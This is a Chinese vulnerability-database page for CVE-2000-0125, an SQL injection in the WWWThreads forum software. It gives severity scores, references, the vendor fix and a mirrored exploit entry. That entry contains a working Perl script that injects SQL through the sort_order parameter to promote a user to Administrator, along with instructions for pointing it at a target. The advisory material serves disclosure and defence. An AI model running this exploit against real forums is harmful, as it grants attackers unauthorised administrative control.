CVE-2000-0125
CVSS7.5
发布时间 :2000-02-03 00:00:00
修订时间 :2008-09-10 15:02:56
NMCOES    

[原文]wwwthreads does not properly cleanse numeric data or table names that are passed to SQL queries, which allows remote attackers to gain privileges for wwwthreads forums.


[CNNVD]WWWThreads SQL命令输入漏洞(CNNVD-200002-027)

        wwwthreads无法正确清洗传递给SQL查询的数字数据或表的名称。远程攻击者利用此漏洞可以提升wwwthreads论坛的特权。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0125
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0125
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-027
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10002031027120.15921-100000@eight.wiretrip.net
(UNKNOWN)  BUGTRAQ  20000203 RFP2K01 - "How I hacked Packetstorm" (wwwthreads advisory)
http://www.securityfocus.com/bid/967
(UNKNOWN)  BID  967

- 漏洞信息

WWWThreads SQL命令输入漏洞
高危 输入验证
2000-02-03 00:00:00 2006-08-07 00:00:00
远程※本地  
        wwwthreads无法正确清洗传递给SQL查询的数字数据或表的名称。远程攻击者利用此漏洞可以提升wwwthreads论坛的特权。

- 公告与补丁

        Wired Community Software has released a fixed version of WWWThreads, available at:
        Demo version:
        http://www.wwwthreads.com/download.html
        Licensed version:
        http://www.wwwthreads.com/licensed/

- 漏洞信息 (19741)

Wired Community Software WWWThreads 5.0 SQL Command Input Vulnerability (EDBID:19741)
cgi remote
2000-02-03 Verified
0 rain forest puppy
N/A [点击下载]
source: http://www.securityfocus.com/bid/967/info


WWWThreads is a web bulletin board program that uses an SQL backend. Due to incomplete input validation, it is possible for an attacker to submit SQL commands through forms and manipulate the contents of the database to gain administrator privileges over the database.

There are various ways for a program to ensure that all entries into data fields are interpreted as data and not SQL commands. WWWThreads uses the quote() function to do this on string values, but fails to verify numeric values in a similar manner. Therefore, SQL commands can be passed to WWWThreads via any numeric argument. These commands can be used to update the status of any user to Administrator and change their security level to '100' (the same level as the Administrator). 

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="localhost";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
        my ($pstr)=@_; my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}

		

- 漏洞信息

10174
WWWThreads /cgi-bin/wwwthreads/changedisplay.pl Multiple Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-02-03 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

WWWThreads SQL Command Input Vulnerability
Input Validation Error 967
Yes Yes
2000-02-03 12:00:00 2009-07-11 01:56:00
Discovered and by rain forest puppy <rfp@wiretrip.net> and posted to Bugtraq on February 3, 2000.

- 受影响的程序版本

Wired Community Software WWWThreads 5.0

- 漏洞讨论

WWWThreads is a web bulletin board program that uses an SQL backend. Due to incomplete input validation, it is possible for an attacker to submit SQL commands through forms and manipulate the contents of the database to gain administrator privileges over the database.

There are various ways for a program to ensure that all entries into data fields are interpreted as data and not SQL commands. WWWThreads uses the quote() function to do this on string values, but fails to verify numeric values in a similar manner. Therefore, SQL commands can be passed to WWWThreads via any numeric argument. These commands can be used to update the status of any user to Administrator and change their security level to '100' (the same level as the Administrator).

- 漏洞利用

Edit this file with the IP address or name of the desired target and a valid username and password hash for that server. The program will then elevate the specified user to administrator status.

- 解决方案

Wired Community Software has released a fixed version of WWWThreads, available at:
Demo version:
http://www.wwwthreads.com/download.html
Licensed version:
http://www.wwwthreads.com/licensed/

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站